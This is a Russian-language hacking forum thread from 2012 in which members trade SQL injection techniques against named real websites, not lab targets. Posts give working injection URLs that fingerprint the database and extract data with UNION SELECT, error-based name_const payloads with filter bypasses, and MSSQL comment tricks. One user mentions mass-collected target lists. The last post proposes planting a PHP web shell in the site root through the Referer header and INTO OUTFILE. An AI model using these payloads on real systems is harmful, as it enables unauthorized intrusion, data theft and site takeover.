Старый 09.04.2012, 06:31   #1931
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://www.dmitrovlib.ru/part/index.php?id=28'
Ещё одна непонятная SQL, вообще без понятия что тут за фильтр.

Сразу ещё один вопрос:
http://1aikido.ru/index.php?id=-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'
Вывод есть в ошибку, однако мускул < 5.1 что не даёт мне выполнить удобную раскрутку в extractvalue
а как крутить через name_const не понятно...
Кого не затруднит, покажите пример, как вывести с лимитом первую запись table_name из information_schema.tables
По поводу первого:
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=4) - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=5) - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/8--+ - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/7--+ - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(1=2)UNION(SELECT(1),2,version (),4,5,6,(7))--+
5.0.89

На счет второго:
Используй вариант, предложенный v1d0q: https://rdot.org/forum/showpost.php?p=20287&postcount=12.
Запрос посылай не через браузер, проверил на твоем примере, работает.
Tigger вне форума   Ответить с цитированием
Старый 09.04.2012, 08:43   #1932
c411k
 
Регистрация: 17.07.2010
Сообщений: 27
Репутация: 29
По умолчанию

Цитата:
Сообщение от yusmat Посмотреть сообщение
есть ли здесь уязвимость ?
нет никакакой фильтрации d
но если передавать методом get $_SERVER['argv'][0] будет on
и переменная $funk перепишеться

PHP код:
define"open", isset( $_SERVER['argv'][0] ) );
$funk NULL;
if ( isset( 
$_GET['d'] ) )
{
    
$funk $_GET['d'];
}
if ( 
open )
{
    
$funk "test";
}
$funk$TestName$res$comment ); 
уязвим, если в php.ini register_argc_argv off
c411k вне форума   Ответить с цитированием
Старый 09.04.2012, 11:55   #1933
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

asp + mssql - кавычка экранируется ' => ''
на null-byte выдает ошибку. информации о том, как mssql воспринимает null-byte не нашел.

есть ли хоть какие варианты по раскрутке ?
http://tinyurl.com/74nvyyn
DrakonHaSh вне форума   Ответить с цитированием
Старый 09.04.2012, 17:46   #1934
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

DrakonHaSh
MSSQL
Comment Out Query
1)/*
2)--
3)%00
Lostnull вне форума   Ответить с цитированием
Старый 09.04.2012, 18:52   #1935
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://www.dmitrovlib.ru/part/index.php?id=28'
Ещё одна непонятная SQL, вообще без понятия что тут за фильтр.

Сразу ещё один вопрос:
http://1aikido.ru/index.php?id=-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'
Вывод есть в ошибку, однако мускул < 5.1 что не даёт мне выполнить удобную раскрутку в extractvalue
а как крутить через name_const не понятно...
Кого не затруднит, покажите пример, как вывести с лимитом первую запись table_name из information_schema.tables
Тут вопрос посерьезнее, что у тебя с памятью, даже я вспомнил что тебе уже раскуривали этот скул
https://rdot.org/forum/showpost.php?p=22695&postcount=1698

Насчет скули, то логически если query_string загоняется в бд + без рерайта, то /**/ для табуляции оптимален. А раз name_const у тебя в этой версии не дает ничего вывести, а extractvalue еще не появился, то rand
~d0s~ вне форума   Ответить с цитированием
Старый 09.04.2012, 19:10   #1936
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от ~d0s~ Посмотреть сообщение
Тут вопрос посерьезнее, что у тебя с памятью, даже я вспомнил что тебе уже раскуривали этот скул
Закончилась память, щас новой купил, на 16 гигов, должно быть нормально.
Так если серьёзно, я это не специально, у меня гиганский список напарсенный, я конечно дубли отсеиваю, но сбои всё равно происходят, а запомнить все адреса сайтов я не могу, впредь постараюсь быть внимательнее.
Nightmare вне форума   Ответить с цитированием
Старый 13.04.2012, 16:16   #1937
nicco
 
Регистрация: 01.01.2011
Сообщений: 45
Репутация: 3
По умолчанию

http://packetstormsecurity.org/files...2012-SA086.txt
nicco вне форума   Ответить с цитированием
Старый 15.04.2012, 11:12   #1938
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Есть хороший хелп по раскрутке SQL когда фильтруется пробел, цитирую:
Цитата:
Сообщение от v1d0q Посмотреть сообщение
Когда нужно вывести информацию через error based sqli, без пробелов. Первый вариант который приходит это

Код:
'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
Но этот вариант работает не всегда, почему? Я уже когда-то писал, нету времени искать.

Рабочий вариант который должен работать всегда был придуман примерно год назад, но о котором почему-то никто не написал.
BlackFun предложил использовать `` в name_const (за что ему большое спасибо), а я в свою очередь впихнуть в свой запрос, в котором мне так сильно были нужны кавычки для чтобы заставить "его" работать. (Заметка: в браузера работать не будет)

Код HTML:
1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
Но он к сожалению не полный, например как вывести в данной конструкции что то кроме версии, лично мне не понятно, и где бы найти пример раскрутки, было бы замечательно.

Например первый вариант даже user() не выводит, не говоря уж о выводе чего либо из информационной схемы, и уж тем более условий where
Nightmare вне форума   Ответить с цитированием
Старый 16.04.2012, 19:31   #1939
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

ребят,подскажите, пожалуйста ...на ачате я помощи не нашел,возможно здесь умельцы найдутся

есть сайт,на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен...я нашёл ошибку и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?

часть файла еррор.лог:
Код:
[15-Apr-2012 18:29:23] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"3000',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='1db420cb93a608c25c4c2990f164ea55'			 		 

[15-Apr-2012 19:19:05] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"0000 union select version() --',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='792bce446a531fd049eaa1b174c5ecba'

ошибка возникает в заголовке referer (ref) (его следует добавлять при перехвате запроса чем-то вроде Tamper data)
QaRTiN вне форума   Ответить с цитированием
Старый 16.04.2012, 20:11   #1940
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Цитата:
Сообщение от Oza Посмотреть сообщение
Это просто лог, не более того.
Если есть инклуд, sql inj, то знание путей пригодится при заливке шелла, и для чтения нужных файлов.
да я понимаю,что это лог...если получится найти LFI,то можно его заинклудить,заранее отправив в заголовке php-код...но разве нельзя,зная по этому файлу какой запрос к БД отправляется,отредактиров ть его так,чтобы он к примеру записал шелл...к примеру,если я добавлю в заголовке referer что-то вроде ') union select <?php system($_GET["cmd"]); ?> into outfile '/var/www/папка сайта/httpdocs/1asdf.php' -- то по сути должен бы создаться мини-щелл в корне сайта...подправьте,если ошибаюсь...только странно,что в еррор.логе знак '--' записывается как содержимое параметра ref, после него должно же было всё отбросится...
QaRTiN вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot